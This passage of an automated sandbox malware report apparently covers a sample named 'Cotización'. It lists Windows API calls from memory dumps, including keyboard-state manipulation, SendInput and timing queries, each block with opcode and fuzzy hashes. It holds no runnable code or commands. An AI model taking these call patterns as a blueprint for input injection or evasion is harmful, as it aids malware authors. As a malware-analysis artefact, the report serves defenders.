                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove_strncmp
                • String ID: >$U$\
                • API String ID: 2666721431-237099441
                • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                APIs
                • GetKeyboardState.USER32(?), ref: 0044C570
                • SetKeyboardState.USER32(00000080), ref: 0044C594
                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessagePost$KeyboardState$InputSend
                • String ID:
                • API String ID: 2221674350-0
                • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcscpy$_wcscat
                • String ID:
                • API String ID: 2037614760-0
                • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                APIs
                • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Variant$Copy$AllocClearErrorLastString
                • String ID:
                • API String ID: 960795272-0
                • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                APIs
                • BeginPaint.USER32(00000000,?), ref: 00447BDF
                • GetWindowRect.USER32(?,?), ref: 00447C5D
                • ScreenToClient.USER32(?,?), ref: 00447C7B
                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                • EndPaint.USER32(?,?), ref: 00447D13
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                • String ID:
                • API String ID: 4189319755-0
                • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                APIs
                • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend$LongWindow$InvalidateRect
                • String ID:
                • API String ID: 1976402638-0
                • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                APIs
                • ShowWindow.USER32(?,00000000), ref: 00440A8A
                • EnableWindow.USER32(?,00000000), ref: 00440AAF
                • ShowWindow.USER32(?,00000000), ref: 00440B18
                • ShowWindow.USER32(?,00000004), ref: 00440B2B
                • EnableWindow.USER32(?,00000001), ref: 00440B50
                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$Show$Enable$MessageSend
                • String ID:
                • API String ID: 642888154-0
                • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                APIs
                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                • EnableWindow.USER32(?,00000001), ref: 00448B72
                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                • EnableWindow.USER32(?,00000001), ref: 00448C09
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$Enable$Show$MessageSend
                • String ID:
                • API String ID: 1871949834-0
                • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                APIs
                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                • SendMessageW.USER32 ref: 00471AE3
                • DestroyIcon.USER32(?), ref: 00471AF4
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                • String ID:
                • API String ID: 3611059338-0
                • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: DestroyWindow$DeleteObject$IconMove
                • String ID:
                • API String ID: 1640429340-0
                • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                APIs
                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                • _wcslen.LIBCMT ref: 004438CD
                • _wcslen.LIBCMT ref: 004438E6
                • _wcstok.LIBCMT ref: 004438F8
                • _wcslen.LIBCMT ref: 0044390C
                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                • _wcstok.LIBCMT ref: 00443931
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                • String ID:
                • API String ID: 3632110297-0
                • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Destroy$DeleteMenuObject$IconWindow
                • String ID:
                • API String ID: 752480666-0
                • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                • String ID:
                • API String ID: 3275902921-0
                • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                • String ID:
                • API String ID: 3275902921-0
                • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                APIs
                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: PerformanceQuery$CounterSleep$Frequency
                • String ID:
                • API String ID: 2833360925-0
                • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                APIs
                • SendMessageW.USER32 ref: 004555C7
                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                • DeleteObject.GDI32(?), ref: 00455736
                • DeleteObject.GDI32(?), ref: 00455744
                • DestroyIcon.USER32(?), ref: 00455752
                • DestroyWindow.USER32(?), ref: 00455760
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                • String ID:
                • API String ID: 3691411573-0
                • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                APIs
                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
